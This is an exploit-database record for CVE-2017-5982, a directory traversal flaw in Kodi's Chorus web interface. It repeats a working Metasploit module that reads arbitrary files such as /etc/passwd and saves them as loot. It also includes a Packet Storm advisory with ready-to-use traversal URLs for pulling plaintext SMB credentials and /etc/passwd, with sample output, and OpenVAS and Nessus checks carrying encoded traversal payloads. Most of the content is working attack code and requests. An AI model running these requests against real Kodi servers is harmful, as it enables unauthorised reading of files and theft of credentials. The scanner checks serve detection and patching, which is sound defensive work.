ID 1337DAY-ID-27301 Type zdt Reporter metasploit Modified 2017-03-13T00:00:00
Description
Usage Info
msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > show actions
...actions...
msf auxiliary(kodi_traversal) > set ACTION <action-name>
msf auxiliary(kodi_traversal) > show options
...show and set options...
msf auxiliary(kodi_traversal) > run
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',
'Description' => %q{
This module exploits a directory traversal flaw found in Kodi before 17.1.
},
'References' =>
[
['CVE', '2017-5982'],
],
'Author' =>
[
'Eric Flokstra', #Original
'jvoisin'
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Feb 12 2017"
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
], self.class)
end
def run_host(ip)
base = normalize_uri(target_uri.path)
peer = "#{ip}:#{rport}"
print_status("Reading '#{datastore['FILE']}'")
traverse = '../' * datastore['DEPTH']
f = datastore['FILE']
f = f[1, f.length] if f =~ /^\//
f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all")
uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all"))
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res and res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
print_error("\t1. File does not exist.")
print_error("\t2. No permission.")
elsif res and res.code == 200
data = res.body.lstrip
fname = datastore['FILE']
p = store_loot(
'kodi',
'application/octet-stream',
ip,
data,
fname
)
vprint_line(data)
print_good("#{fname} stored as '#{p}'")
else
print_error('Fail to obtain file for some unknown reason')
end
end
end
# 0day.today [2018-03-17] #
{"href": "https://0day.today/exploit/description/27301", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a directory traversal flaw found in Kodi before 17.1.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2017-5982'],\r\n ],\r\n 'Author' =>\r\n [\r\n 'Eric Flokstra', #Original\r\n 'jvoisin'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => \"Feb 12 2017\"\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),\r\n OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),\r\n OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])\r\n ], self.class)\r\n end\r\n\r\n\r\n def run_host(ip)\r\n base = normalize_uri(target_uri.path)\r\n\r\n peer = \"#{ip}:#{rport}\"\r\n\r\n print_status(\"Reading '#{datastore['FILE']}'\")\r\n\r\n traverse = '../' * datastore['DEPTH']\r\n f = datastore['FILE']\r\n f = f[1, f.length] if f =~ /^\\//\r\n f = \"image/image://\" + Rex::Text.uri_encode(traverse + f, \"hex-all\")\r\n\r\n uri = normalize_uri(base, Rex::Text.uri_encode(f, \"hex-all\"))\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res and res.code != 200\r\n print_error(\"Unable to read '#{datastore['FILE']}', possibily because:\")\r\n print_error(\"\\t1. File does not exist.\")\r\n print_error(\"\\t2. No permission.\")\r\n\r\n elsif res and res.code == 200\r\n data = res.body.lstrip\r\n fname = datastore['FILE']\r\n p = store_loot(\r\n 'kodi',\r\n 'application/octet-stream',\r\n ip,\r\n data,\r\n fname\r\n )\r\n\r\n vprint_line(data)\r\n print_good(\"#{fname} stored as '#{p}'\")\r\n\r\n else\r\n print_error('Fail to obtain file for some unknown reason')\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-17] #", "bulletinFamily": "exploit", "modified": "2017-03-13T00:00:00", "title": "Kodi 17.0 Local File Inclusion Exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 5.0}, "sourceHref": "https://0day.today/exploit/27301", "cvelist": ["CVE-2017-5982"], "description": "\n\n#### Usage Info\nmsf > use auxiliary/scanner/http/kodi_traversal\rmsf auxiliary(kodi_traversal) > show actions\r...actions...\rmsf auxiliary(kodi_traversal) > set ACTION <action-name>\rmsf auxiliary(kodi_traversal) > show options\r...show and set options...\rmsf auxiliary(kodi_traversal) > run", "viewCount": 13, "published": "2017-03-13T00:00:00", "edition": 1, "id": "1337DAY-ID-27301", "type": "zdt", "lastseen": "2018-03-17T03:15:03", "reporter": "metasploit", "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2018-03-17T03:15:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-5982"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141103"]}, {"type": "nessus", "idList": ["KODI_LOCAL_FILE_INCLUSION.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/KODI_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106586"]}], "modified": "2018-03-17T03:15:03", "rev": 2}, "vulnersScore": 5.2}, "references": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "Directory traversal vulnerability in the Chorus2 2.4.2 add-on for Kodi allows remote attackers to read arbitrary files via a %2E%2E%252e (encoded dot dot slash) in the image path, as demonstrated by image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-28T18:59:00", "title": "CVE-2017-5982", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5982"], "modified": "2017-03-03T02:59:00", "cpe": ["cpe:/a:kodi:kodi:17.1"], "id": "CVE-2017-5982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5982", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-02-15T15:04:46", "description": "", "published": "2017-02-15T00:00:00", "type": "packetstorm", "title": "Kodi 17.1 Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5982"], "modified": "2017-02-15T00:00:00", "id": "PACKETSTORM:141103", "href": "https://packetstormsecurity.com/files/141103/Kodi-17.1-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: Kodi - Local File Inclusion \n# Date: 12 February 2017 \n# Exploit Author: Eric Flokstra \n# Vendor Homepage: https://kodi.tv/ \n# Software Link: https://kodi.tv/download/ \n# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2 \n# Tested on: Linux \n# CVE: CVE-2017-5982 \n \nKodi (formerly XBMC) is a free and open-source media player software \napplication developed by the XBMC Foundation. Chorus is a web interface \nfor controlling and interacting with Kodi. It is hosted by the Kodi \ninstallation. \n \nThe web interface loads a thumbnail of an image, video or add-on when \nselecting a category in the left menu with the following request: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F \n \nInsufficient validation of user input is performed on this URL resulting \nin a local file inclusion vulnerability. This enables attackers \nto retrieve arbitrary files from the filesystem by changing the location \nafter the '/image/image%3A%2F%2Fa part. \n \n<--Examples--> \n \n1) If Kodi is connected to a NAS the following request can be used to \nobtain plain-text SMB credentials: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml \n \nResponse: \n \n<passwords><path><from pathversion=\"1\">smb://192.168.1.15/</from><to \npathversion=\"1\">smb://username:password@192.168.1.15//share</to></path></passwords> \n \n2) Request to retrieve the content of /etc/passwd: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd \n \nResponse: \n \nroot:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \ngames:x:5:60:games:/usr/games:/usr/sbin/nologin \nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin \nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin \nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin \nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin \nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin \nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin \nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin \n... \n \n-- \n--------------------------------------------------------------------- \nPGP Key ID = 0x6D336541EAB627EE \nFingerprint = DFBB E38E D848 4658 EC4C D161 6D33 6541 EAB6 27EE \nhttps://pgp.mit.edu/pks/lookup?search=erp.flokstra@gmail.com&op=index \n--------------------------------------------------------------------- \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141103/kodi171-lfi.txt"}], "openvas": [{"lastseen": "2020-05-12T17:20:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5982"], "description": "Kodi is prone to an arbitrary file disclosure vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2017-02-13T00:00:00", "id": "OPENVAS:1361412562310106586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106586", "type": "openvas", "title": "Kodi Local File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Kodi Local File Inclusion Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:kodi:kodi\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106586\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-13 10:37:26 +0700 (Mon, 13 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-5982\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Kodi Local File Inclusion Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_kodi_web_server_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Kodi/WebServer/installed\");\n\n script_tag(name:\"summary\", value:\"Kodi is prone to an arbitrary file disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to read a system file.\");\n\n script_tag(name:\"insight\", value:\"The web interface loads a thumbnail of an image, video or add-on when\nselecting a category in the left menu. Insufficient validation of user input is performed on this URL resulting\nin a local file inclusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"A unauthenticated attacker may read arbitrary files from the file system.\");\n\n script_tag(name:\"solution\", value:\"Update to Kodi version 17.2 or later. For details please see the references.\");\n\n script_xref(name:\"URL\", value:\"https://kodi.tv/article/kodi-v172-minor-bug-fix-and-security-release\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/41312/\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nfiles = traversal_files();\n\nforeach file (keys(files)) {\n url = dir + '/image/image%3A%2F%2F%2e%2e%252f' + str_replace(string: files[file], find: \"/\", replace: \"%252f\");\n\n if (http_vuln_check(port: port, url: url, pattern: file, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-04-01T03:34:59", "description": "The Kodi media player server running on the remote host is affected by\nan information disclosure vulnerability in the Chorus web interface\ndue to improper validation of user-supplied input to the /image/\nscript, specifically when path traversal is employed (e.g., %2F) in\nthe URL. An unauthenticated, remote attacker can exploit this issue,\nvia a specially crafted URL, to cause the inclusion of local files,\nresulting in the disclosure of arbitrary files.", "edition": 30, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-03-22T00:00:00", "title": "Kodi Local File Inclusion Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5982"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:kodi:kodi"], "id": "KODI_LOCAL_FILE_INCLUSION.NASL", "href": "https://www.tenable.com/plugins/nessus/97894", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97894);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2017-5982\");\n script_bugtraq_id(96481);\n script_xref(name:\"EDB-ID\", value:\"41312\");\n\n script_name(english:\"Kodi Local File Inclusion Information Disclosure\");\n script_summary(english:\"Accesses a restricted file on the server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A media player server running on the remote host is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Kodi media player server running on the remote host is affected by\nan information disclosure vulnerability in the Chorus web interface\ndue to improper validation of user-supplied input to the /image/\nscript, specifically when path traversal is employed (e.g., %2F) in\nthe URL. An unauthenticated, remote attacker can exploit this issue,\nvia a specially crafted URL, to cause the inclusion of local files,\nresulting in the disclosure of arbitrary files.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.exploit-db.com/exploits/41312/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2017/Feb/27\");\n script_set_attribute(attribute:\"solution\", value:\n\"No solution was available at this time. Contact the vendor for a fix\nor workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kodi:kodi\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kodi_detect.nbin\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"installed_sw/Kodi\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"Kodi\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:8080);\ninstall = get_single_install(app_name:appname, port:port);\n\nrequest = \"/image/image%3a%2f%2f%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66\" +\n \"%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34\";\n\nres = http_send_recv3(item:request, port:port, method:\"GET\", exit_on_fail:TRUE);\nif (\"200\" >!< res[0] || \"root:\" >!< res[2])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, install[\"version\"]);\n}\n\nsecurity_report_v4(\n port:port,\n file:'/etc/passwd',\n request:make_list(build_url(port:port, qs:request)),\n output:res[2],\n severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-09T20:03:14", "description": "This module exploits a directory traversal flaw found in Kodi before 17.1.\n", "published": "2017-02-19T20:57:27", "type": "metasploit", "title": "Kodi 17.0 Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5982"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/SCANNER/HTTP/KODI_TRAVERSAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',\n 'Description' => %q{\n This module exploits a directory traversal flaw found in Kodi before 17.1.\n },\n 'References' =>\n [\n ['CVE', '2017-5982'],\n ],\n 'Author' =>\n [\n 'Eric Flokstra', #Original\n 'jvoisin'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-02-12'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),\n OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),\n OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])\n ])\n end\n\n\n def run_host(ip)\n base = normalize_uri(target_uri.path)\n\n peer = \"#{ip}:#{rport}\"\n\n print_status(\"Reading '#{datastore['FILE']}'\")\n\n traverse = '../' * datastore['DEPTH']\n f = datastore['FILE']\n f = f[1, f.length] if f =~ /^\\//\n f = \"image/image://\" + Rex::Text.uri_encode(traverse + f, \"hex-all\")\n\n uri = normalize_uri(base, Rex::Text.uri_encode(f, \"hex-all\"))\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res and res.code != 200\n print_error(\"Unable to read '#{datastore['FILE']}', possibily because:\")\n print_error(\"\\t1. File does not exist.\")\n print_error(\"\\t2. No permission.\")\n\n elsif res and res.code == 200\n data = res.body.lstrip\n fname = datastore['FILE']\n p = store_loot(\n 'kodi',\n 'application/octet-stream',\n ip,\n data,\n fname\n )\n\n vprint_line(data)\n print_good(\"#{fname} stored as '#{p}'\")\n\n else\n print_error('Fail to obtain file for some unknown reason')\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/kodi_traversal.rb"}]}
